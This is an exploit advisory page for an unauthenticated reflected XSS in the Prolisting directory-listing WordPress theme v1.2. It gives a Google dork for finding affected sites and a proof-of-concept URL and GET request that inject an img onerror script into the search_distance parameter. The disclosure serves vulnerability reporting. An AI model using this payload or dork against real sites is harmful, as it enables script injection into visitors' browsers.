Prolisting - Directory Listing WordPress Theme v1.2 - Unauthenticated Reflected XSS

2020.07.13
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] Exploit Title: Prolisting - Directory Listing WordPress Theme v1.2 - Unauthenticated Reflected XSS [+] Google Dork: inurl:/wp-content/themes/prolist/ [+] Date: 2020-06-17 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: ApusTheme [ https://themeforest.net/user/apustheme ] [+] Software Version: 1.2 [+] Software Link: https://themeforest.net/item/prolist-directory-listing-wordpress-theme/19504953 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-79 ### [ Info: ] [i] An Unauthenticated Reflected XSS vulnerability was discovered in the Prolisting Directory Listing theme through 1.2 for WordPress. ### [ PoC: ] [!] https://demoapus.com/prolisting/listings/?search_distance=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`;%3E [!] GET /prolisting/listings/?search_distance=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`;%3E HTTP/1.1 Host: demoapus.com ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-06-17-prolisting-directory-listing-wordpress-theme-v1-2.txt
https://themeforest.net/item/prolist-directory-listing-wordpress-theme/19504953


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top